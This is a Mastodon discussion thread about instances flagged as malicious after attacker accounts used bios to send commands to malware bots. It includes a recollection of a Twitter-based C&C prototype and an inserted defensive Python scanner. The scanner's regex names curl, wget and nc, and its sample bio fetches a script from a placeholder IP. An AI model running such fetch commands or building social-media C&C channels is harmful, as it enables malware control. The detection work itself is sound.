I have made a post about some Mastodon instances being associated with malware and explaining what I found: https://github.com/mastodon/mastodon/discussions/18688
@hugo here is the key bit from the above: “… an attacker creates a profile on a social media site like anyone else. Then adds the URL of their profile (or RSS feed) to the malware bot. Once the bot infects a third-party computer, it fetches the social media profile of the attacker and looks for instructions. The attacker can then issue instructions/commands using standard social media tools, and the bot follows those instructions.” cc: @mastohost
@hugo Thank you for this! We had the same issue with mstdn.social on the exact same day as mastodon.social, but fortunately my response was in time to not get 'banned'.
I have done many scans since this issue but never found anything other than the one account with a "ping IP" in the bio! I've spent a load of time getting us off all VirusTotal-related sites since many just copy-paste the result.
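The scan described above, as an added example that is not code from anyone in this thread: it flattens the HTML `note` (bio) field of Mastodon-style account objects and flags bios that contain a command verb followed by an IP address or URL. The "ping IP" pattern is the one reported here; the other verbs, the regex, and the sample accounts are assumptions constructed for illustration.

```python
import re
from html import unescape

# Constructed sample mirroring the "note" (bio) field of Mastodon account
# objects. These are made-up accounts, not data from any real instance.
SAMPLE_ACCOUNTS = [
    {"username": "alice", "note": "<p>Photographer. Cats.</p>"},
    {"username": "b0t-herder", "note": "<p>ping 203.0.113.45</p>"},
    {"username": "devops_dan", "note": "<p>I run wget http://203.0.113.9/u.sh for fun</p>"},
    {"username": "carol", "note": "<p>Ping me for coffee!</p>"},
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# A command-like token followed by an IP or URL target. "ping <IP>" is the
# pattern seen in the thread; curl/wget/nc are assumed extensions of it.
CMD_RE = re.compile(
    r"\b(ping|curl|wget|nc|ncat)\s+(?:-\S+\s+)*(" + IPV4 + r"|https?://\S+)",
    re.IGNORECASE,
)
TAG_RE = re.compile(r"<[^>]+>")


def bio_text(note: str) -> str:
    """Mastodon stores bios as HTML; strip tags and entities before matching."""
    return unescape(TAG_RE.sub(" ", note))


def find_suspicious_bios(accounts):
    """Return (username, matched_text) for every bio that looks like a command.

    Plain words such as "Ping me" do not match because the target must be an
    IP address or URL, which keeps false positives from everyday bios low.
    """
    hits = []
    for acct in accounts:
        text = bio_text(acct.get("note", ""))
        for m in CMD_RE.finditer(text):
            hits.append((acct["username"], m.group(0)))
    return hits


if __name__ == "__main__":
    for username, snippet in find_suspicious_bios(SAMPLE_ACCOUNTS):
        print(f"review @{username}: {snippet!r}")
```

In practice the account list would come from the instance's admin account API or database export; a hit is a review queue item for a moderator, not an automatic suspension.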
@stux Thank you so much for sharing.
How did you get mstdn.social out of VirusTotal? I could do it on CRDF Threat Center but don't know how I can do it on VirusTotal.
@hugo Get in touch with all vendors that list you as malicious 😮
There were one or two that I couldn't find anywhere, so I bet we're still flagged.
Most have forums or removal request forms.
@tchambers @hugo Aiii.. I see indeed! https://www.virustotal.com/gui/domain/indieweb.social
Just gave you a +1 at least ❤️
Another theme that keeps popping up is ppl on Fedi using (#)GriftHub.
Also, as part of a holistic movement towards #censorshipResistance, all instances should strive to federate over Tor or I2P.
We posit that federation over #I2P should be the default because Tor doesn't like lots of traffic (e.g. they don't recommend torrenting over Tor, etc.).
@hugo around 20 years ago various large IRC channels were shut down because they were being used for C&C. I then wrote a test program that made Twitter usable as a C&C frontend. At that time there was still an RSS feed and you could easily search it for commands. I then steganographically hid the commands in cat images that were delivered as PNG.
Since I got the hang of it with my little knowledge and in a few days, I'm sure that such or similar methods are probably widespread.
@hugo wait, so is Mastodon safe to use? Also, one of my old friends is a cyber security expert that researches these sorts of things and is also crazy about crypto security.
Masto.pt is a Mastodon instance for people who speak Portuguese.